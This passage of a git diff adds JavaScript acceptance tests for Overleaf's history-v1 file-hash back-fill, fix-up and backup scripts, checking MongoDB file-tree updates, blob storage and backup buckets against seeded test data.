expect(output.stats).deep.equal(STATS_ALL) + }) + it('should have logged the bad file-tree', function () { + expectBadFileTreeMessage( + projectIdBadFileTree0, + 'bad file-tree, bad folder', + 'rootFolder.0' + ) + expectBadFileTreeMessage( + projectIdBadFileTree1, + 'bad file-tree, bad folder', + 'rootFolder.0' + ) + expectBadFileTreeMessage( + projectIdBadFileTree1, + 'bad file-tree, bad folder', + 'rootFolder.0' + ) + expectBadFileTreeMessage( + projectIdBadFileTree2, + 'bad file-tree, bad fileRef id', + 'rootFolder.0.fileRefs.0' + ) + expectBadFileTreeMessage( + projectIdBadFileTree3, + 'bad file-tree, bad folder', + 'rootFolder.0.folders.0' + ) + expectBadFileTreeMessage( + projectIdBadFileTree3, + 'bad file-tree, bad folders', + 'rootFolder.0.folders.1.folders' + ) + expectBadFileTreeMessage( + projectIdBadFileTree3, + 'bad file-tree, bad fileRefs', + 'rootFolder.0.folders.1.fileRefs' + ) + }) + commonAssertions() + }) + + describe('when processing hashed files later', function () { + let output1, output2 + before('prepare environment', prepareEnvironment) + before('run script without hashed files', async function () { + output1 = await runScript([], {}) + }) + before('run script with hashed files', async function () { + output2 = await 
runScript(['--processHashedFiles=true'], {}) + }) + it('should print stats', function () { + expect(output1.stats).deep.equal(STATS_ALL) + expect(output2.stats).deep.equal({ + ...STATS_FILES_HASHED_EXTRA, + projects: 10, + blobs: 13, + backedUpBlobs: 13, + badFileTrees: 4, + mongoUpdates: 3, + }) + }) + commonAssertions(true) + }) + + describe('full run CONCURRENCY=10', function () { + let output + before('prepare environment', prepareEnvironment) + before('run script', async function () { + output = await runScript([], { + CONCURRENCY: '10', + }) + }) + it('should print stats', function () { + expect(output.stats).deep.equal(STATS_ALL) + }) + commonAssertions() + }) + + describe('full run STREAM_HIGH_WATER_MARK=1MB', function () { + let output + before('prepare environment', prepareEnvironment) + before('run script', async function () { + output = await runScript([], { + STREAM_HIGH_WATER_MARK: (1024 * 1024).toString(), + }) + }) + it('should print stats', function () { + expect(output.stats).deep.equal(STATS_ALL) + }) + commonAssertions() + }) + + describe('when processing hashed files', function () { + let output + before('prepare environment', prepareEnvironment) + before('run script', async function () { + output = await runScript(['--processHashedFiles=true'], {}) + }) + it('should print stats', function () { + expect(output.stats).deep.equal( + sumStats(STATS_ALL, STATS_FILES_HASHED_EXTRA) + ) + }) + commonAssertions(true) + }) + + describe('with something in the bucket already', function () { + before('prepare environment', prepareEnvironment) + before('create a file in s3', async function () { + const buf = Buffer.from(fileId0.toString()) + await backupPersistor.sendStream( + projectBlobsBucket, + makeProjectKey(historyId0, gitBlobHash(fileId0)), + Stream.Readable.from([buf]), + { contentLength: buf.byteLength } + ) + }) + let output + before('run script', async function () { + output = await runScript([], { + CONCURRENCY: '1', + }) + }) + + it('should print stats', function () { + expect(output.stats).deep.equal( + sumStats(STATS_ALL, { + ...STATS_ALL_ZERO, + // one remote deduplicate + deduplicatedWriteToAWSRemoteCount: 1, + deduplicatedWriteToAWSRemoteEgress: 28, + writeToAWSEgress: -28, // subtract skipped egress + }) + ) + }) + commonAssertions() + }) + + describe('with something in the bucket and marked as processed', function () { + before('prepare environment', prepareEnvironment) + before('create a file in s3', async function () { + await backupPersistor.sendStream( + projectBlobsBucket, + makeProjectKey(historyId0, hashTextBlob0), + Stream.Readable.from([contentTextBlob0]), + { contentLength: contentTextBlob0.byteLength } + ) + await backedUpBlobs.insertMany([ + { + _id: projectId0, + blobs: [binaryForGitBlobHash(hashTextBlob0)], + }, + ]) + }) + let output + before('run script', async function () { + output = await runScript([], { + CONCURRENCY: '1', + }) + }) + + it('should print stats', function () { + expect(output.stats).deep.equal( + sumStats(STATS_ALL, { + ...STATS_ALL_ZERO, + backedUpBlobs: 1, + writeToAWSCount: -1, + writeToAWSEgress: -27, + readFromGCSCount: -1, + readFromGCSIngress: -7, + }) + ) + }) + commonAssertions() + }) + + describe('split run CONCURRENCY=1', function () { + // part0: project0+project1, part1: project2 onwards + const edge = projectId1.toString() + let outputPart0, outputPart1 + before('prepare environment', prepareEnvironment) + before('run script on part 0', async function () { + outputPart0 = await 
runScript([`--BATCH_RANGE_END=${edge}`], { + CONCURRENCY: '1', + }) + }) + before('run script on part 1', async function () { + outputPart1 = await runScript([`--BATCH_RANGE_START=${edge}`], { + CONCURRENCY: '1', + }) + }) + + it('should print stats', function () { + expect(outputPart0.stats).to.deep.equal(STATS_UP_TO_PROJECT1) + expect(outputPart1.stats).to.deep.equal(STATS_UP_FROM_PROJECT1_ONWARD) + }) + commonAssertions() + }) + + describe('projectIds from file', () => { + const path0 = '/tmp/project-ids-0.txt' + const path1 = '/tmp/project-ids-1.txt' + before('prepare environment', prepareEnvironment) + before('create project-ids.txt files', async function () { + await fs.promises.writeFile( + path0, + [projectId0, projectId1].map(id => id.toString()).join('\n') + ) + await fs.promises.writeFile( + path1, + [ + projectId2, + projectId3, + projectIdDeleted0, + projectIdDeleted1, + projectIdNoHistory, + projectIdNoHistoryDeleted, + projectIdHardDeleted, + projectIdNoOverleaf, + projectIdNoOverleafDeleted, + projectIdBadFileTree0, + projectIdBadFileTree1, + projectIdBadFileTree2, + projectIdBadFileTree3, + ] + .map(id => id.toString()) + .join('\n') + ) + }) + + let outputPart0, outputPart1 + before('run script on part 0', async function () { + outputPart0 = await runScript([`--projectIdsFrom=${path0}`]) + }) + before('run script on part 1', async function () { + outputPart1 = await runScript([`--projectIdsFrom=${path1}`]) + }) + + /** + * @param {string} msg + * @param {ObjectId} projectId + */ + function expectLogEntry(msg, projectId) { + expect(outputPart1.result.stdout).to.include(msg) + const log = JSON.parse( + outputPart1.result.stdout + .split('\n') + .find(l => l.includes(`"${msg}"`) && l.includes(projectId.toString())) + ) + expect(log).to.contain({ + projectId: projectId.toString(), + msg, + }) + } + it('should flag the hard-deleted project', function () { + expectLogEntry('project hard-deleted', projectIdHardDeleted) + }) + it('should flag the projects without history id', function () { + expectLogEntry('project has no history id', projectIdNoOverleaf) + expectLogEntry('project has no history id', projectIdNoOverleafDeleted) + expectLogEntry('project has no history id', projectIdNoHistory) + expectLogEntry('project has no history id', projectIdNoHistoryDeleted) + }) + it('should print stats', function () { + expect(outputPart0.stats).to.deep.equal(STATS_UP_TO_PROJECT1) + expect(outputPart1.stats).to.deep.equal(STATS_UP_FROM_PROJECT1_ONWARD) + }) + commonAssertions() + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/back_fill_file_hash_fix_up.test.mjs b/services/history-v1/test/acceptance/js/storage/back_fill_file_hash_fix_up.test.mjs new file mode 100644 index 0000000..ceafa24 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/back_fill_file_hash_fix_up.test.mjs @@ -0,0 +1,818 @@ +import fs from 'node:fs' +import Crypto from 'node:crypto' +import Stream from 'node:stream' +import { promisify } from 'node:util' +import { Binary, ObjectId } from 'mongodb' +import { Blob } from 'overleaf-editor-core' +import { backedUpBlobs, blobs, db } from '../../../../storage/lib/mongodb.js' +import cleanup from './support/cleanup.js' +import testProjects from '../api/support/test_projects.js' +import { execFile } from 'node:child_process' +import chai, { expect } from 'chai' +import chaiExclude from 'chai-exclude' +import config from 'config' +import { WritableBuffer } from '@overleaf/stream-utils' +import { + backupPersistor, + projectBlobsBucket, +} from 
'../../../../storage/lib/backupPersistor.mjs'
+import projectKey from '../../../../storage/lib/project_key.js'
+import {
+  BlobStore,
+  makeProjectKey,
+} from '../../../../storage/lib/blob_store/index.js'
+import ObjectPersistor from '@overleaf/object-persistor'
+
+chai.use(chaiExclude)
+
+const TIMEOUT = 20 * 1_000
+
+const { deksBucket } = config.get('backupStore')
+const { tieringStorageClass } = config.get('backupPersistor')
+
+const projectsCollection = db.collection('projects')
+const deletedProjectsCollection = db.collection('deletedProjects')
+
+const FILESTORE_PERSISTOR = ObjectPersistor({
+  backend: 'gcs',
+  gcs: {
+    endpoint: {
+      apiEndpoint: process.env.GCS_API_ENDPOINT,
+      projectId: process.env.GCS_PROJECT_ID,
+    },
+  },
+})
+
+/**
+ * @param {ObjectId} objectId
+ * @return {string}
+ */
+function gitBlobHash(objectId) {
+  return gitBlobHashBuffer(Buffer.from(objectId.toString()))
+}
+
+/**
+ * @param {Buffer} buf
+ * @return {string}
+ */
+function gitBlobHashBuffer(buf) {
+  const sha = Crypto.createHash('sha1')
+  sha.update(`blob ${buf.byteLength}\x00`)
+  sha.update(buf)
+  return sha.digest('hex')
+}
+
+/**
+ * @param {string} gitBlobHash
+ * @return {Binary}
+ */
+function binaryForGitBlobHash(gitBlobHash) {
+  return new Binary(Buffer.from(gitBlobHash, 'hex'))
+}
+
+async function listS3Bucket(bucket, wantStorageClass) {
+  const client = backupPersistor._getClientForBucket(bucket)
+  const response = await client.listObjectsV2({ Bucket: bucket }).promise()
+
+  for (const object of response.Contents || []) {
+    expect(object).to.have.property('StorageClass', wantStorageClass)
+  }
+
+  return (response.Contents || []).map(item => item.Key || '')
+}
+
+function objectIdFromTime(timestamp) {
+  return ObjectId.createFromTime(new Date(timestamp).getTime() / 1000)
+}
+
+const PRINT_IDS_AND_HASHES_FOR_DEBUGGING = false
+
+describe('back_fill_file_hash_fix_up script', function () {
+  this.timeout(TIMEOUT)
+  const USER_FILES_BUCKET_NAME = 'fake-user-files-gcs'
+
+  const projectId0 = objectIdFromTime('2017-01-01T00:00:00Z')
+  const projectIdDeleted0 = objectIdFromTime('2017-01-01T00:04:00Z')
+  const historyId0 = 42 // stored as a number in mongo
+  const historyIdDeleted0 = projectIdDeleted0.toString()
+  const fileIdWithDifferentHashFound = objectIdFromTime('2017-02-01T00:00:00Z')
+  const fileIdInGoodState = objectIdFromTime('2017-02-01T00:01:00Z')
+  const fileIdBlobExistsInGCS0 = objectIdFromTime('2017-02-01T00:02:00Z')
+  const fileIdWithDifferentHashNotFound0 = objectIdFromTime(
+    '2017-02-01T00:03:00Z'
+  )
+  const fileIdWithDifferentHashNotFound1 = objectIdFromTime(
+    '2017-02-01T00:04:00Z'
+  )
+  const fileIdBlobExistsInGCSCorrupted = objectIdFromTime(
+    '2017-02-01T00:05:00Z'
+  )
+  const fileIdMissing0 = objectIdFromTime('2024-02-01T00:06:00Z')
+  const fileIdMissing1 = objectIdFromTime('2017-02-01T00:07:00Z')
+  const fileIdWithDifferentHashRestore = objectIdFromTime(
+    '2017-02-01T00:08:00Z'
+  )
+  const fileIdBlobExistsInGCS1 = objectIdFromTime('2017-02-01T00:09:00Z')
+  const fileIdRestoreFromFilestore0 = objectIdFromTime('2017-02-01T00:10:00Z')
+  const fileIdRestoreFromFilestore1 = objectIdFromTime('2017-02-01T00:11:00Z')
+  const fileIdMissing2 = objectIdFromTime('2017-02-01T00:12:00Z')
+  const fileIdHashMissing0 = objectIdFromTime('2017-02-01T00:13:00Z')
+  const fileIdHashMissing1 = objectIdFromTime('2017-02-01T00:14:00Z')
+  const contentCorruptedBlob = 'string that produces another hash'
+  const contentDoesNotExistAsBlob = 'does not exist as blob'
+  const hashDoesNotExistAsBlob =
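+  // gitBlobHashBuffer (defined above) mirrors git's blob hashing:
+  // sha1('blob <byteLength>\0' + content). For reference, an empty buffer
+  // hashes to e69de29bb2d1d6434b8b29ae775ad8c2e48c5391, git's well-known
+  // empty-blob id.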
gitBlobHashBuffer( + Buffer.from(contentDoesNotExistAsBlob) + ) + const deleteProjectsRecordId0 = new ObjectId() + const writtenBlobs = [ + { + projectId: projectId0, + historyId: historyId0, + fileId: fileIdBlobExistsInGCS0, + }, + { + projectId: projectId0, + historyId: historyId0, + fileId: fileIdBlobExistsInGCS1, + }, + { + projectId: projectId0, + historyId: historyId0, + fileId: fileIdWithDifferentHashNotFound0, + }, + { + projectId: projectId0, + historyId: historyId0, + fileId: fileIdRestoreFromFilestore0, + }, + { + projectId: projectId0, + historyId: historyId0, + fileId: fileIdRestoreFromFilestore1, + }, + { + projectId: projectId0, + historyId: historyId0, + fileId: fileIdHashMissing0, + }, + { + projectId: projectId0, + historyId: historyId0, + fileId: fileIdHashMissing1, + }, + { + projectId: projectIdDeleted0, + historyId: historyIdDeleted0, + fileId: fileIdWithDifferentHashNotFound1, + }, + ] + const logs = [ + { + projectId: projectId0, + fileId: fileIdWithDifferentHashFound, + err: { message: 'OError: hash mismatch' }, + hash: gitBlobHash(fileIdMissing0), // does not matter + entry: { + ctx: { historyId: historyId0.toString() }, + hash: gitBlobHash(fileIdInGoodState), + }, + msg: 'failed to process file', + }, + { + projectId: projectId0, + fileId: fileIdWithDifferentHashRestore, + err: { message: 'OError: hash mismatch' }, + hash: hashDoesNotExistAsBlob, + entry: { + ctx: { historyId: historyId0.toString() }, + hash: gitBlobHash(fileIdMissing0), // does not matter + }, + msg: 'failed to process file', + }, + { + projectId: projectId0, + fileId: fileIdWithDifferentHashNotFound0, + err: { message: 'OError: hash mismatch' }, + hash: gitBlobHash(fileIdWithDifferentHashNotFound0), + entry: { + ctx: { historyId: historyId0.toString() }, + hash: hashDoesNotExistAsBlob, + }, + msg: 'failed to process file', + }, + { + projectId: projectId0, + fileId: fileIdRestoreFromFilestore0, + err: { message: 'OError: hash mismatch' }, + hash: gitBlobHash(fileIdRestoreFromFilestore0), + entry: { + ctx: { historyId: historyId0.toString() }, + hash: hashDoesNotExistAsBlob, + }, + msg: 'failed to process file', + }, + { + projectId: projectIdDeleted0, + fileId: fileIdWithDifferentHashNotFound1, + err: { message: 'OError: hash mismatch' }, + hash: gitBlobHash(fileIdWithDifferentHashNotFound1), + entry: { + ctx: { historyId: historyIdDeleted0.toString() }, + hash: hashDoesNotExistAsBlob, + }, + msg: 'failed to process file', + }, + { + projectId: projectId0, + fileId: fileIdMissing0, + bucketName: USER_FILES_BUCKET_NAME, + err: { message: 'NotFoundError' }, + msg: 'failed to process file', + }, + { + projectId: projectId0, + fileId: fileIdMissing2, + bucketName: USER_FILES_BUCKET_NAME, + err: { message: 'NotFoundError' }, + msg: 'failed to process file', + }, + { + projectId: projectId0, + fileId: fileIdBlobExistsInGCS0, + hash: gitBlobHash(fileIdBlobExistsInGCS0), + err: { message: 'storage.objects.delete' }, + msg: 'failed to process file', + }, + { + projectId: projectId0, + fileId: fileIdBlobExistsInGCSCorrupted, + hash: gitBlobHash(fileIdBlobExistsInGCSCorrupted), + err: { message: 'storage.objects.delete' }, + msg: 'failed to process file', + }, + { + projectId: projectId0, + fileId: fileIdBlobExistsInGCS1, + hash: gitBlobHash(fileIdBlobExistsInGCS1), + err: { message: 'storage.objects.delete' }, + msg: 'failed to process file', + }, + { + projectId: projectId0, + fileId: fileIdRestoreFromFilestore1, + err: { message: 'storage.objects.delete' }, + msg: 'failed to process file', + }, + { + 
projectId: projectIdDeleted0, + fileId: fileIdMissing1, + bucketName: USER_FILES_BUCKET_NAME, + err: { message: 'NotFoundError' }, + msg: 'failed to process file', + }, + { + err: { message: 'spurious error' }, + msg: 'failed to process file, trying again', + }, + { + err: { message: 'some other error' }, + msg: 'failed to process file', + }, + // from find_malformed_filetrees.mjs + { + projectId: projectId0, + _id: fileIdHashMissing0, + reason: 'bad file hash', + msg: 'bad file-tree path', + }, + { + projectId: projectId0, + _id: fileIdHashMissing1, + reason: 'bad file hash', + msg: 'bad file-tree path', + }, + ] + if (PRINT_IDS_AND_HASHES_FOR_DEBUGGING) { + const fileIds = { + fileIdWithDifferentHashFound, + fileIdInGoodState, + fileIdBlobExistsInGCS0, + fileIdBlobExistsInGCS1, + fileIdWithDifferentHashNotFound0, + fileIdWithDifferentHashNotFound1, + fileIdBlobExistsInGCSCorrupted, + fileIdMissing0, + fileIdMissing1, + fileIdMissing2, + fileIdWithDifferentHashRestore, + fileIdRestoreFromFilestore0, + fileIdRestoreFromFilestore1, + fileIdHashMissing0, + fileIdHashMissing1, + } + console.log({ + projectId0, + projectIdDeleted0, + historyId0, + historyIdDeleted0, + ...fileIds, + hashDoesNotExistAsBlob, + }) + for (const [name, v] of Object.entries(fileIds)) { + console.log( + name, + gitBlobHash(v), + Array.from(binaryForGitBlobHash(gitBlobHash(v)).value()) + ) + } + } + + before(cleanup.everything) + + before('populate blobs/GCS', async function () { + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectId0}/${fileIdRestoreFromFilestore0}`, + Stream.Readable.from([fileIdRestoreFromFilestore0.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectId0}/${fileIdRestoreFromFilestore1}`, + Stream.Readable.from([fileIdRestoreFromFilestore1.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectId0}/${fileIdHashMissing0}`, + Stream.Readable.from([fileIdHashMissing0.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectId0}/${fileIdHashMissing1}`, + Stream.Readable.from([fileIdHashMissing1.toString()]) + ) + await new BlobStore(historyId0.toString()).putString( + fileIdHashMissing1.toString() // partially processed + ) + await new BlobStore(historyId0.toString()).putString( + fileIdBlobExistsInGCS0.toString() + ) + await new BlobStore(historyId0.toString()).putString( + fileIdBlobExistsInGCS1.toString() + ) + await new BlobStore(historyId0.toString()).putString( + fileIdRestoreFromFilestore1.toString() + ) + const path = '/tmp/test-blob-corrupted' + try { + await fs.promises.writeFile(path, contentCorruptedBlob) + await new BlobStore(historyId0.toString()).putBlob( + path, + new Blob(gitBlobHash(fileIdBlobExistsInGCSCorrupted), 42) + ) + } finally { + await fs.promises.rm(path, { force: true }) + } + await cleanup.postgres() + await cleanup.mongo() + await Promise.all([ + testProjects.createEmptyProject(historyId0.toString()), + testProjects.createEmptyProject(historyIdDeleted0), + ]) + await new BlobStore(historyId0.toString()).putString( + fileIdWithDifferentHashNotFound0.toString() + ) + await new BlobStore(historyIdDeleted0.toString()).putString( + fileIdWithDifferentHashNotFound1.toString() + ) + await new BlobStore(historyId0.toString()).putString( + fileIdInGoodState.toString() + ) + }) + + before('populate mongo', async function () { + await projectsCollection.insertMany([ + { + _id: projectId0, + rootFolder: [ + { + fileRefs: [ + { _id: 
fileIdMissing0 }, + { _id: fileIdMissing0 }, // bad file-tree, duplicated fileRef. + { _id: fileIdMissing2 }, + { _id: fileIdHashMissing0 }, + { _id: fileIdHashMissing1 }, + { + _id: fileIdWithDifferentHashFound, + hash: gitBlobHash(fileIdInGoodState), + }, + { + _id: fileIdWithDifferentHashRestore, + hash: gitBlobHash(fileIdMissing0), + }, + ], + folders: [ + { + docs: [], + }, + null, + { + fileRefs: [ + null, + { + _id: fileIdInGoodState, + hash: gitBlobHash(fileIdInGoodState), + }, + { + _id: fileIdWithDifferentHashNotFound0, + hash: hashDoesNotExistAsBlob, + }, + { + _id: fileIdRestoreFromFilestore0, + hash: hashDoesNotExistAsBlob, + }, + { + _id: fileIdRestoreFromFilestore1, + }, + { + _id: fileIdBlobExistsInGCS0, + hash: gitBlobHash(fileIdBlobExistsInGCS0), + }, + { + _id: fileIdBlobExistsInGCSCorrupted, + hash: gitBlobHash(fileIdBlobExistsInGCSCorrupted), + }, + { _id: fileIdBlobExistsInGCS1 }, + ], + folders: [], + }, + ], + }, + ], + overleaf: { history: { id: historyId0 } }, + version: 0, + }, + ]) + await deletedProjectsCollection.insertMany([ + { + _id: deleteProjectsRecordId0, + project: { + _id: projectIdDeleted0, + rootFolder: [ + { + fileRefs: [ + { + _id: fileIdWithDifferentHashNotFound1, + hash: hashDoesNotExistAsBlob, + }, + ], + folders: [ + { + fileRefs: [], + folders: [ + { fileRefs: [{ _id: fileIdMissing1 }], folders: [] }, + ], + }, + ], + }, + ], + overleaf: { history: { id: historyIdDeleted0 } }, + version: 100, + }, + deleterData: { + deletedProjectId: projectIdDeleted0, + }, + }, + ]) + }) + + /** + * @param {Array<string>} args + * @param {Record<string, string>} env + * @return {Promise<{ stdout: string, stderr: string, status: number }>} + */ + async function tryRunScript(args = [], env = {}) { + let result + try { + result = await promisify(execFile)( + process.argv0, + ['storage/scripts/back_fill_file_hash_fix_up.mjs', ...args], + { + encoding: 'utf-8', + timeout: TIMEOUT - 500, + env: { + ...process.env, + USER_FILES_BUCKET_NAME, + SLEEP_BEFORE_EXIT: '1', + ...env, + LOG_LEVEL: 'warn', // Override LOG_LEVEL of acceptance tests + }, + } + ) + result.status = 0 + } catch (err) { + const { stdout, stderr, code } = err + if (typeof code !== 'number') { + console.log(err) + } + result = { stdout, stderr, status: code } + } + expect((await fs.promises.readdir('/tmp')).join(';')).to.not.match( + /back_fill_file_hash/ + ) + return result + } + async function runScriptWithLogs() { + const logsPath = '/tmp/test-script-logs' + let result + try { + await fs.promises.writeFile( + logsPath, + logs.map(e => JSON.stringify(e)).join('\n') + ) + result = await tryRunScript([`--logs=${logsPath}`]) + } finally { + await fs.promises.rm(logsPath, { force: true }) + } + const stats = JSON.parse(result.stdout.trim().split('\n').pop()) + return { + result, + stats, + } + } + + let result, stats + before(async function () { + ;({ result, stats } = await runScriptWithLogs()) + }) + it('should print stats', function () { + expect(stats).to.contain({ + processedLines: 16, + success: 11, + alreadyProcessed: 0, + fileDeleted: 0, + skipped: 0, + failed: 3, + unmatched: 1, + }) + }) + it('should handle re-run on same logs', async function () { + ;({ stats } = await runScriptWithLogs()) + expect(stats).to.contain({ + processedLines: 16, + success: 0, + alreadyProcessed: 8, + fileDeleted: 3, + skipped: 0, + failed: 3, + unmatched: 1, + }) + }) + it('should flag the unknown fatal error', function () { + const unknown = result.stdout + .split('\n') + .filter(l => l.includes('unknown fatal 
error')) + expect(unknown).to.have.length(1) + const [line] = unknown + expect(line).to.exist + expect(line).to.include('some other error') + }) + it('should flag the unexpected blob on mismatched hash', function () { + const line = result.stdout + .split('\n') + .find(l => l.includes('found blob with computed filestore object hash')) + expect(line).to.exist + expect(line).to.include(projectId0.toString()) + expect(line).to.include(fileIdWithDifferentHashFound.toString()) + expect(line).to.include(gitBlobHash(fileIdInGoodState)) + }) + it('should flag the need to restore', function () { + const line = result.stdout + .split('\n') + .find(l => l.includes('missing blob, need to restore filestore file')) + expect(line).to.exist + expect(line).to.include(projectId0.toString()) + expect(line).to.include(fileIdWithDifferentHashRestore.toString()) + expect(line).to.include(hashDoesNotExistAsBlob) + }) + it('should flag the corrupted blob', function () { + const line = result.stdout + .split('\n') + .find(l => l.includes('blob corrupted')) + expect(line).to.exist + expect(line).to.include(projectId0.toString()) + expect(line).to.include(fileIdBlobExistsInGCSCorrupted.toString()) + expect(line).to.include( + gitBlobHashBuffer(Buffer.from(contentCorruptedBlob)) + ) + expect(line).to.include(gitBlobHash(fileIdBlobExistsInGCSCorrupted)) + }) + it('should update mongo', async function () { + expect(await projectsCollection.find({}).toArray()) + .excludingEvery([ + 'currentEndTimestamp', + 'currentEndVersion', + 'updatedAt', + 'backup', + ]) + .to.deep.equal([ + { + _id: projectId0, + rootFolder: [ + { + fileRefs: [ + // Removed + // { _id: fileIdMissing0 }, + // Removed + // { _id: fileIdMissing2 }, + // Added hash + { + _id: fileIdHashMissing0, + hash: gitBlobHash(fileIdHashMissing0), + }, + // Added hash + { + _id: fileIdHashMissing1, + hash: gitBlobHash(fileIdHashMissing1), + }, + // No change, should warn about the find. + { + _id: fileIdWithDifferentHashFound, + hash: gitBlobHash(fileIdInGoodState), + }, + // No change, should warn about the need to restore. 
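+ // The stale hash below is expected to stay in place: for this case the
+ // fix-up script only logs 'missing blob, need to restore filestore file'
+ // (see the assertion in the test above) and leaves the file-tree entry unchanged.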
+ { + _id: fileIdWithDifferentHashRestore, + hash: gitBlobHash(fileIdMissing0), + }, + ], + folders: [ + { + docs: [], + }, + null, + { + fileRefs: [ + null, + // No change + { + _id: fileIdInGoodState, + hash: gitBlobHash(fileIdInGoodState), + }, + // Updated hash + { + _id: fileIdWithDifferentHashNotFound0, + hash: gitBlobHash(fileIdWithDifferentHashNotFound0), + }, + // Updated hash + { + _id: fileIdRestoreFromFilestore0, + hash: gitBlobHash(fileIdRestoreFromFilestore0), + }, + // Added hash + { + _id: fileIdRestoreFromFilestore1, + hash: gitBlobHash(fileIdRestoreFromFilestore1), + }, + // No change, blob created + { + _id: fileIdBlobExistsInGCS0, + hash: gitBlobHash(fileIdBlobExistsInGCS0), + }, + // No change, flagged + { + _id: fileIdBlobExistsInGCSCorrupted, + hash: gitBlobHash(fileIdBlobExistsInGCSCorrupted), + }, + // Added hash + { + _id: fileIdBlobExistsInGCS1, + hash: gitBlobHash(fileIdBlobExistsInGCS1), + }, + ], + folders: [], + }, + ], + }, + ], + overleaf: { history: { id: historyId0 } }, + // Incremented when removing file/updating hash + version: 8, + }, + ]) + expect(await deletedProjectsCollection.find({}).toArray()).to.deep.equal([ + { + _id: deleteProjectsRecordId0, + project: { + _id: projectIdDeleted0, + rootFolder: [ + { + fileRefs: [ + // Updated hash + { + _id: fileIdWithDifferentHashNotFound1, + hash: gitBlobHash(fileIdWithDifferentHashNotFound1), + }, + ], + folders: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [ + // Removed + // { _id: fileIdMissing1 }, + ], + folders: [], + }, + ], + }, + ], + }, + ], + overleaf: { history: { id: historyIdDeleted0 } }, + // Incremented when removing file/updating hash + version: 102, + }, + deleterData: { + deletedProjectId: projectIdDeleted0, + }, + }, + ]) + const writtenBlobsByProject = new Map() + for (const { projectId, fileId } of writtenBlobs) { + writtenBlobsByProject.set( + projectId, + (writtenBlobsByProject.get(projectId) || []).concat([fileId]) + ) + } + expect( + (await backedUpBlobs.find({}, { sort: { _id: 1 } }).toArray()).map( + entry => { + // blobs are pushed unordered into mongo. Sort the list for consistency. 
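+ // Both the actual and the expected arrays below are sorted with the same
+ // default comparator, so the deep comparison is insensitive to insertion order.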
+ entry.blobs.sort() + return entry + } + ) + ).to.deep.equal( + Array.from(writtenBlobsByProject.entries()).map( + ([projectId, fileIds]) => { + return { + _id: projectId, + blobs: fileIds + .map(fileId => binaryForGitBlobHash(gitBlobHash(fileId))) + .sort(), + } + } + ) + ) + }) + it('should have backed up all the files', async function () { + expect(tieringStorageClass).to.exist + const objects = await listS3Bucket(projectBlobsBucket, tieringStorageClass) + expect(objects.sort()).to.deep.equal( + writtenBlobs + .map(({ historyId, fileId, hash }) => + makeProjectKey(historyId, hash || gitBlobHash(fileId)) + ) + .sort() + ) + for (let { historyId, fileId } of writtenBlobs) { + const hash = gitBlobHash(fileId.toString()) + const s = await backupPersistor.getObjectStream( + projectBlobsBucket, + makeProjectKey(historyId, hash), + { autoGunzip: true } + ) + const buf = new WritableBuffer() + await Stream.promises.pipeline(s, buf) + expect(gitBlobHashBuffer(buf.getContents())).to.equal(hash) + const id = buf.getContents().toString('utf-8') + expect(id).to.equal(fileId.toString()) + // double check we are not comparing 'undefined' or '[object Object]' above + expect(id).to.match(/^[a-f0-9]{24}$/) + } + const deks = await listS3Bucket(deksBucket, 'STANDARD') + expect(deks.sort()).to.deep.equal( + Array.from( + new Set( + writtenBlobs.map( + ({ historyId }) => projectKey.format(historyId) + '/dek' + ) + ) + ).sort() + ) + }) + it('should have written the back filled files to history v1', async function () { + for (const { historyId, fileId } of writtenBlobs) { + const blobStore = new BlobStore(historyId.toString()) + const hash = gitBlobHash(fileId.toString()) + const blob = await blobStore.getBlob(hash) + expect(blob).to.exist + expect(blob.getByteLength()).to.equal(24) + const id = await blobStore.getString(hash) + expect(id).to.equal(fileId.toString()) + // double check we are not comparing 'undefined' or '[object Object]' above + expect(id).to.match(/^[a-f0-9]{24}$/) + } + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/backup.test.mjs b/services/history-v1/test/acceptance/js/storage/backup.test.mjs new file mode 100644 index 0000000..83087a1 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/backup.test.mjs @@ -0,0 +1,682 @@ +import config from 'config' +import { ObjectId } from 'mongodb' +import { expect } from 'chai' +import { + backedUpBlobs, + client, + globalBlobs, +} from '../../../../storage/lib/mongodb.js' +import persistor from '../../../../storage/lib/persistor.js' +import { + loadGlobalBlobs, + BlobStore, + makeProjectKey, +} from '../../../../storage/lib/blob_store/index.js' +import { NotFoundError } from '@overleaf/object-persistor/src/Errors.js' +import projectKey from '../../../../storage/lib/project_key.js' +import { getBackupStatus } from '../../../../storage/lib/backup_store/index.js' +import { text, buffer } from 'node:stream/consumers' +import { createGunzip } from 'node:zlib' +import { Change, Operation, File, TextOperation } from 'overleaf-editor-core' +import ChunkStore from '../../../../storage/lib/chunk_store/index.js' +import persistChanges from '../../../../storage/lib/persist_changes.js' +import { historyStore } from '../../../../storage/lib/history_store.js' +import { execFile } from 'node:child_process' +import { promisify } from 'node:util' +import testFiles from '../storage/support/test_files.js' +import fs from 'node:fs' +import { + backupBlob, + storeBlobBackup, +} from '../../../../storage/lib/backupBlob.mjs' +import { + 
backupPersistor, + projectBlobsBucket, + chunksBucket, +} from '../../../../storage/lib/backupPersistor.mjs' +import { Readable } from 'node:stream' + +const projectsCollection = client.db().collection('projects') + +/** + * @param {ObjectId} projectId + * @param {number} version + * @return {string} + */ +function makeChunkKey(projectId, version) { + return projectKey.format(projectId) + '/' + projectKey.pad(version) +} + +describe('backup script', function () { + let project + let projectId, historyId + let limitsToPersistImmediately + + before(function () { + // Used to provide a limit which forces us to persist all of the changes + const farFuture = new Date() + farFuture.setTime(farFuture.getTime() + 7 * 24 * 3600 * 1000) + limitsToPersistImmediately = { + minChangeTimestamp: farFuture, + maxChangeTimestamp: farFuture, + maxChanges: 10, + maxChunkChanges: 10, + } + }) + + beforeEach(async function () { + // Set up test projects with proper history metadata + projectId = new ObjectId() + historyId = projectId.toString() + project = { + _id: projectId, + overleaf: { + history: { + id: historyId, + currentEndVersion: 0, // Will be updated as changes are made + currentEndTimestamp: new Date(), // Will be updated as changes are made + }, + backup: { + // Start with no backup state + }, + }, + } + + // Pre-load the global blobs + await 